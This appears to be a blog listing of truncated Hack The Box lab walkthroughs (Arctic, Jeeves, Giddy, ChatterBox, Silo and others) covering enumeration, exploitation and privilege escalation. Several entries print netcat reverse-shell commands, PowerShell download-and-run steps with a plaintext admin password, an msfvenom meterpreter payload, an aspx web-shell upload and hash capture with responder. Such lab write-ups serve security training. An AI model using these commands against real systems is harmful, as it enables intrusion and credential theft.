HTB – Arctic Walkthrough

nmap Port 8500 – ColdFusion ColdFusion File Inclusion Hash Crack JSP Shell Creation & File Upload & Shell Run the task and open the file on the following directory C:\ColdFusion8\wwwroot\CFIDE\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimchurri) via Powershell Get an admin shell with exe file .

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HTB – NetMon Walkthrough

nmap Anonymous FTP PRTG Files are under C:\ProgramData\Paessler\PRTG Network Manager Looking for password The version of PRTG is vulnerable Use the following exploit: I got NT Authority\System

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HTB – Tenten Walkthrough

nmap WPScan – enumerate users WPScan – Plugin Vulnerability (IDOR) found As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name} I checked if the I uploaded exist, and yes it’s uploaded Also in HTML code of application page, I… Continue reading HTB – Tenten Walkthrough

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HTB – Jeeves Walkthrough

nmap gobuster Jenkins  Code Execution Create a project on Jenkins Low Privileged Shell Enter commands under Build Section Powershell wget “” -outfile “nc.exe” Nc.exe 7777 -e cmd.exe And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell Meterpreter Shell Create a… Continue reading HTB – Jeeves Walkthrough

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HTB – Giddy Walkthrough

nmap  gobuster Search field – SQL error SQL InjectionYou can use the cheatsheet of PentestMonkey you can use sqlmapsqlmap –url –dbms=mssql –dbs databases  current usersqlmap –url –dbms=mssql –current-user Capture MSSQL credentials with xp_dirtree, smbserver.pyFollowing blogspost explains the process very good; EXEC MASTER.sys.xp_dirtree ‘\\yourIP\something’ listen with responder to steal the user hashresponder -I tun0… Continue reading HTB – Giddy Walkthrough

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HTB – ChatterBox Walkthrough

nmap Exploit Create a shell with msfvenom as described in the exploit Get the exploit from searchsploit or exploitdb  Shell Privilege Escalation reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” (New-Object System.Net.WebClient).DownloadFile(‘’,’C:\Users\Alfred\Desktop\nc.exe’)$username = ‘administrator’$password = ‘Welcome1!’$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 1234’ -Credential $credential  And we get an admin… Continue reading HTB – ChatterBox Walkthrough

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HTB – Querier Walkthrough

Nmap SMB Shares Get the file and unzip it SQL credentials found in vbaProject.bin Use Impacket’s mssqlclient scipt to login Try to enable xm_cmdshell but the current user is not privileged Try to steal credentials by calling a fake share on your own server Listen with responder Crack the hash with john Login again as… Continue reading HTB – Querier Walkthrough

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HTB: Silo

Enumeration nmap SID Enumeration Password Guesser – odat Uploading aspx shell for command inejction ./odat-libc2.5-x86_64 dbmsxslprocessor -s -d XE -U scott -P tiger –putFile ‘C:\inetpub\wwwroot\’ ‘shell.aspx’ /usr/share/webshells/aspx/cmdasp.aspx –sysdba Reverse Shell Or create msfvenom payload for reverse shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx Upload the file./odat-libc2.5-x86_64 dbmsxslprocessor -s -d XE -U… Continue reading HTB: Silo

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